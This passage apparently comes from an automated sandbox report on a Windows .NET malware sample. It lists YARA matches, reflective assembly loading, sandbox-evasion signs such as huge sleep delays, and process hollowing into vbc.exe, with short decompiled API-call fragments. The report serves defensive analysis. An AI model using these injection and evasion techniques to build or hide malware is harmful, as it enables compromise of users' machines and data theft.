                  Source: 0.2.Hh8hqqbu9X.exe.44fc0f0.1.raw.unpack, 9acMGeWL.cs.Net Code: kk9ngdJi System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Hh8hqqbu9X.exe.44fc0f0.1.raw.unpack, 9acMGeWL.cs.Net Code: kk9ngdJi System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Hh8hqqbu9X.exe.5d70000.4.raw.unpack, 7rdeodzy.cs.Net Code: run System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Hh8hqqbu9X.exe.5d70000.4.raw.unpack, 7rdeodzy.cs.Net Code: run System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Hh8hqqbu9X.exe.5d70000.4.raw.unpack, 7rdeodzy.cs.Net Code: run System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Hh8hqqbu9X.exe.5d70000.4.raw.unpack, 9mxqGQC9.cs.Net Code: yuX3dnbw System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Hh8hqqbu9X.exe.5d70000.4.raw.unpack, DeEP5Q00.cs.Net Code: hQyn916S System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.Hh8hqqbu9X.exe.5d70000.4.raw.unpack, DeEP5Q00.cs.Net Code: hQyn916S System.Reflection.Assembly.Load(byte[])
                  Source: Yara matchFile source: 1.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Hh8hqqbu9X.exe.4520930.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Hh8hqqbu9X.exe.4520930.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Hh8hqqbu9X.exe.44fc0f0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2118840141.00000000044E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2118642185.0000000003300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Hh8hqqbu9X.exe PID: 7064, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3292, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AD4
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AFC
                  Source: Hh8hqqbu9X.exe, RPBXLg3LtNewIeGOl9.csHigh entropy of concatenated method names: '_003ChryENiJIkyOkCgExDsPXkewfRNvXJCidsLgsAmzvhKkrTgUHpTfTzKjvNBtLWTcjzYmAqtVpswbGUawqyOIvIxsdSNlwWqjxdCRDfACVTHmkfWELctnarltDtarkrFpGBVCzkkOOuYCwzoNqfjiqMEfgFpkyFBADtJUvTyDTVtQQBPNQIyDCcSsaAHJlugIILMMdgMQndUBhIhSTWxSoxcvPNcejb_003Eb__0', 'hEqb0Qn4p', 'S6g3naQBJ', 'nXgluLUyy', 'EAXMvopED'
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: Hh8hqqbu9X.exe PID: 7064, type: MEMORYSTR
                  Source: Hh8hqqbu9X.exe, 00000000.00000002.2118642185.0000000003300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ASWHOOKX
                  Source: Hh8hqqbu9X.exe, 00000000.00000002.2118642185.0000000003300000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ASWHOOKXTJUQ
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeMemory allocated: 1820000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeMemory allocated: 3290000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeMemory allocated: 5290000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exe TID: 5508Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe TID: 1292Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeThread delayed: delay time: 60000Jump to behavior
                  Source: vbc.exe, 00000001.00000002.3381859873.00000000006C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]1_2_0040317B
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 1_2_00402B7C GetProcessHeap,RtlAllocateHeap,1_2_00402B7C
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, 7rdeodzy.csReference to suspicious API methods: Conversions.ToGenericParameter<ZuYtTLL8>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref Ik9PaOZi), ref Zso4MIce), typeof(ZuYtTLL8)))
                  Source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, 7rdeodzy.csReference to suspicious API methods: Conversions.ToGenericParameter<ZuYtTLL8>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref Ik9PaOZi), ref Zso4MIce), typeof(ZuYtTLL8)))
                  Source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, nTN1JDKX.csReference to suspicious API methods: OpenProcess(HAfiHlRZ.kkKl39pk, bInheritHandle: false, process.Id)
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000Jump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 415000Jump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 41A000Jump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 4A0000Jump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 27E008Jump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeQueries volume information: C:\Users\user\Desktop\Hh8hqqbu9X.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 1_2_00406069 GetUserNameW,1_2_00406069
                  Source: C:\Users\user\Desktop\Hh8hqqbu9X.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
